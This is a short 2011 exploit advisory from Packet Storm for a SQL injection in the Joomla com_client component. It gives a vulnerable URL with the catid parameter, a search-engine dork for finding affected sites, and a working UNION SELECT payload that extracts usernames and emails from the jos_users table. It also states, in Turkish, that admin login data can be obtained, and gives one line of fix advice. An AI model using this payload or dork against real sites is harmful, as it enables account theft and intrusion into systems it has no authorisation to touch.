Lucene search

K
packetstormFl0riXPACKETSTORM:98683
HistoryFeb 23, 2011 - 12:00 a.m.

Joomla Client SQL Injection

2011-02-2300:00:00
Fl0riX
packetstormsecurity.com
17
joomla
sql injection
vulnerability
admin login
bug researchers
`  
<------------------- header data start ------------------- >  
#############################################################  
Joomla Component client SQL Injection Vulnerability   
#############################################################  
  
# Author : Fl0riX ~ Bug Researchers  
  
# Name : Joomla com_client  
  
# Bug Type : SQL injection  
  
# Infection : Admin Login Bilgileri Alinabilir.  
  
# Demo Vuln :  
[+]/index.php?option=com_client&task=category&prf=fl0&catid=1[EXPLOIT]  
  
[+] Dork: inurl:"index.php?option=com_client"  
  
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.  
#############################################################  
< ------------------- header data end of ------------------- >  
< -- bug code start -- >  
EXPLOIT :  
+and+1=2+union+select+1,concat(username,0x3a,email)fl0rix,3,4,5,6+from+jos_users--  
< -- bug code end of -- >   
  
`